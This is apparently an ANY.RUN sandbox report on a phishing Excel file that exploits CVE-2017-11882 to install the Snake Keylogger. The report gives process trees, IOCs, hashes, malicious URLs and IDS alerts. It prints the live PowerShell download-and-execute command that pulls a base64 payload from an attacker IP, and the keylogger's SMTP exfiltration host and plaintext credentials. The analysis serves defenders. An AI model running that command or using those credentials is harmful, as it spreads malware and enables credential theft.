analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Solicitud de cotizaciòn..xlsx

Full analysis: https://app.any.run/tasks/440d4e74-553a-4531-8451-f7f6bda138f4
Verdict: Malicious activity
Threats:

A keylogger is a type of spyware that infects a system and has the ability to record every keystroke made on the device. This lets attackers collect personal information of victims, which may include their online banking credentials, as well as personal conversations. The most widespread vector of attack leading to a keylogger infection begins with a phishing email or link. Keylogging is also often present in remote access trojans as part of an extended set of malicious tools.

Malware Trends Tracker     >>>
Analysis date: December 05, 2022, 19:04:52
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:
exploit
cve-2017-11882
trojan
opendir
evasion
snake
keylogger
Indicators:
MIME: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
File info: Microsoft Excel 2007+
MD5:

CD9567E232B722B34985981E32633321

SHA1:

3B1FDB9DACD8A1F20FDC0F03D2088855924452A7

SHA256:

7AE8B3795F2EFFF6E153B1290633C327A5D3ADE19F40ECC0A891579ED5587C61

SSDEEP:

24576:Cmv7PSn7ViMIY4oSX6fM1lPH/VE+njnkLQp:CmMVHfSlPHJngEp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Runs injected code in another process

      • powercfg.exe (PID: 3044)
      • rundll32.exe (PID: 2332)

    • Suspicious connection from the Equation Editor

      • EQNEDT32.EXE (PID: 2748)

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2748)

    • Application was injected by another process

      • svchost.exe (PID: 872)
      • SearchIndexer.exe (PID: 2044)
      • svchost.exe (PID: 896)
      • svchost.exe (PID: 496)

    • SNAKEKEYLOGGER was detected

      • RegAsm.exe (PID: 2316)

    • Unusual connection from system programs

      • RegAsm.exe (PID: 2316)

    • SNAKE detected by memory dumps

      • RegAsm.exe (PID: 2316)

    • Creates a writable file the system directory

      • powercfg.exe (PID: 3044)

    • Steals credentials from Web Browsers

      • RegAsm.exe (PID: 2316)

    • Loads the Task Scheduler COM API

      • rundll32.exe (PID: 2332)

  • SUSPICIOUS

    • Reads settings of System Certificates

      • EQNEDT32.EXE (PID: 2748)

    • Reads the Internet Settings

      • EQNEDT32.EXE (PID: 2748)
      • RegAsm.exe (PID: 2316)

    • Connects to the server without a host name

      • powershell.exe (PID: 2908)

    • Executes as Windows Service

      • powercfg.exe (PID: 3044)
      • lpremove.exe (PID: 2812)
      • rundll32.exe (PID: 2332)
      • vssvc.exe (PID: 1292)

    • Checks Windows Trust Settings

      • EQNEDT32.EXE (PID: 2748)

    • Executes scripts

      • EQNEDT32.EXE (PID: 2748)

    • Reads security settings of Internet Explorer

      • EQNEDT32.EXE (PID: 2748)

    • Executes PowerShell scripts

      • WScript.exe (PID: 1736)

    • Removes files from Windows the directory

      • powercfg.exe (PID: 3044)
      • rundll32.exe (PID: 2332)
      • mcbuilder.exe (PID: 2976)

    • Reads Microsoft Outlook installation path

      • powercfg.exe (PID: 3044)

    • Searches for installed software

      • rundll32.exe (PID: 2332)

  • INFO

    • Reads the computer name

      • EQNEDT32.EXE (PID: 2748)
      • RegAsm.exe (PID: 2316)

    • Checks supported languages

      • EQNEDT32.EXE (PID: 2748)
      • RegAsm.exe (PID: 2316)

    • Checks proxy server information

      • EQNEDT32.EXE (PID: 2748)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 2908)

    • Creates a file in a temporary directory

      • powershell.exe (PID: 2908)

    • Reads Environment values

      • RegAsm.exe (PID: 2316)

    • Creates files in the Windows directory

      • powercfg.exe (PID: 3044)
      • rundll32.exe (PID: 2332)
      • mcbuilder.exe (PID: 2976)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

SnakeKeylogger

(PID) Process(2316) RegAsm.exe
ProtocolSMTP
Hostkeefort.com.ec
Port587
Credentials
Username[email protected]
Passwordcousinsnake@@
No Malware configuration.

TRiD

.xlsx | Excel Microsoft Office Open XML Format document (61.2)
.zip | Open Packaging Conventions container (31.5)
.zip | ZIP compressed archive (7.2)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
58
Monitored processes
16
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start inject inject inject inject excel.exe no specs eqnedt32.exe DllHost.exe no specs powercfg.exe no specs svchost.exe wscript.exe no specs powershell.exe regasm.exe no specs #SNAKE regasm.exe rundll32.exe no specs lpremove.exe no specs mcbuilder.exe no specs vssvc.exe no specs svchost.exe svchost.exe searchindexer.exe

Process information

PID
CMD
Path
Indicators
Parent process
2424"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEExplorer.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.4756.1000
Modules
Images
c:\program files\microsoft office\office14\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
2748"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
svchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2324C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}C:\Windows\system32\DllHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
COM Surrogate
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3044C:\Windows\System32\powercfg.exe -energy -autoC:\Windows\System32\powercfg.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Power Settings Command-Line Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\powercfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
872C:\Windows\system32\svchost.exe -k DcomLaunchC:\Windows\system32\svchost.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\umpnpmgr.dll
c:\windows\system32\spinf.dll
c:\windows\system32\user32.dll
1736"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\greeee.vbs" C:\Windows\SysWOW64\WScript.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\syswow64\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
2908"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://4.204.233.44/DLL/NoStartUp.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.sdkgajsasjkkgjsfddvfsdvn/42.021.871.591//:ptth'))C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64win.dll
c:\windows\syswow64\ntdll.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll
764"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Exit code:
4294967295
Version:
4.7.2558.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
2316"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft .NET Assembly Registration Utility
Version:
4.7.2558.0 built by: NET471REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\regasm.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64cpu.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\mscoree.dll
c:\windows\system32\user32.dll
SnakeKeylogger
(PID) Process(2316) RegAsm.exe
ProtocolSMTP
Hostkeefort.com.ec
Port587
Credentials
Username[email protected]
Passwordcousinsnake@@
2332C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreationC:\Windows\system32\rundll32.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\rundll32.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
Total events
19 028
Read events
18 674
Write events
350
Delete events
4

Modification events

(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:|k:
Value:
7C6B3A0078090000010000000000000000000000
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1041
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1042
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1046
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1036
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1031
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1040
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1049
Value:
Off
(PID) Process:(2424) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:3082
Value:
Off
Executable files
0
Suspicious files
145
Text files
6
Unknown types
96

Dropped files

PID
Process
Filename
Type
2424EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRE37C.tmp.cvr
MD5:
SHA256:
2324DllHost.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat
MD5:
SHA256:
3044powercfg.exeC:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-ntkl.etl
MD5:
SHA256:
496svchost.exeC:\Windows\appcompat\programs\RecentFileCache.bcftxt
MD5:DB919CBFD8209C206725ED7BD8244D8C
SHA256:9ACD346C89EBA0B7497A768523DA4C2EC2818E169A460A5DB0742D43A4C51F89
2324DllHost.exeC:\Users\admin\AppData\Local\Microsoft\Windows\WebCache\V01.logbinary
MD5:5E3C6B74D1FD73C5D74C3871945A55DB
SHA256:B6CB57DE1A5EBF078CFCD4EBC2630DB260D2F2A377D0AEA280B603DC0E8A8CF9
2976mcbuilder.exeC:\Windows\rescache\wip\Segment0.cmfbinary
MD5:68B35CF25AE98FD9B310DF7132450024
SHA256:62F5CF8173B64216ACF11ACC1F291FCDFBE25FFEBD5B83FDA80DD516D0DDA527
3044powercfg.exeC:\ProgramData\Microsoft\Windows\Power Efficiency Diagnostics\energy-report.htmlhtml
MD5:65EDAA311B3506A8F8192A17C2705B0C
SHA256:92B325BA150153152DE3F1AC56C2F8E0B57C0656BE429211596360427FB9B52C
2332rundll32.exeC:\System Volume Information\SPP\metadata-2
MD5:
SHA256:
2976mcbuilder.exeC:\Windows\rescache\wip\ResCache.hitbinary
MD5:62E6BAB699C953298F691D554E07E1CB
SHA256:04CD989148636E47ECFA650ED12EE1DABDFF74BFAD44256C0D103C66DE35646A
2748EQNEDT32.EXEC:\Users\admin\AppData\Roaming\greeee.vbstext
MD5:AB3FE7A67DDD142A9BAA136EF4125704
SHA256:84A64183C0D06A0A6AC7D9B431E843F74BEAC457F5561D12D58B349AE6F9035C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
5
DNS requests
3
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2908
powershell.exe
GET
200
195.178.120.24:80
http://195.178.120.24/nvdsfvddfsjgkkjsasjagkds.txt
unknown
text
168 Kb
malicious
2908
powershell.exe
GET
200
4.204.233.44:80
http://4.204.233.44/DLL/NoStartUp.ppam
US
text
12.0 Kb
malicious
2316
RegAsm.exe
GET
200
158.101.44.242:80
http://checkip.dyndns.org/
US
html
104 b
shared
2908
powershell.exe
GET
200
4.204.233.44:80
http://4.204.233.44/Rump/Rump.xls
US
text
53.1 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2748
EQNEDT32.EXE
142.250.185.202:443
firebasestorage.googleapis.com
GOOGLE
US
whitelisted
2908
powershell.exe
195.178.120.24:80
Delis LLC
US
malicious
2908
powershell.exe
4.204.233.44:80
MICROSOFT-CORP-MSN-AS-BLOCK
US
malicious
2316
RegAsm.exe
88.99.90.21:587
keefort.com.ec
Hetzner Online GmbH
DE
malicious
2316
RegAsm.exe
158.101.44.242:80
checkip.dyndns.org
ORACLE-BMC-31898
US
malicious

DNS requests

Domain
IP
Reputation
firebasestorage.googleapis.com
  • 142.250.185.202
  • 172.217.18.10
  • 172.217.16.202
  • 142.250.185.170
  • 172.217.23.106
  • 142.250.184.202
  • 142.250.186.138
  • 142.250.185.234
  • 142.250.185.74
  • 142.250.185.138
  • 142.250.181.234
  • 142.250.185.106
  • 142.250.186.42
  • 142.250.186.170
  • 172.217.16.138
  • 142.250.184.234
whitelisted
checkip.dyndns.org
  • 158.101.44.242
  • 193.122.130.0
  • 132.226.247.73
  • 132.226.8.169
  • 193.122.6.168
shared
keefort.com.ec
  • 88.99.90.21
malicious

Threats

PID
Process
Class
Message
2908
powershell.exe
A Network Trojan was detected
ET TROJAN Powershell commands sent B64 2
2908
powershell.exe
Misc activity
ET POLICY EXE Base64 Encoded potential malware
2908
powershell.exe
Potentially Bad Traffic
ET INFO Dotted Quad Host XLS Request
2908
powershell.exe
Potentially Bad Traffic
ET INFO Terse Request for .txt - Likely Hostile
2908
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1
Misc activity
ET INFO DYNAMIC_DNS Query to *.dyndns. Domain
Misc activity
AV INFO Query to checkip.dyndns. Domain
2316
RegAsm.exe
Potential Corporate Privacy Violation
ET POLICY External IP Lookup - checkip.dyndns.org
2316
RegAsm.exe
Generic Protocol Command Decode
SURICATA Applayer Detect protocol only one direction
4 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Solicitud de cotizaciòn..xlsx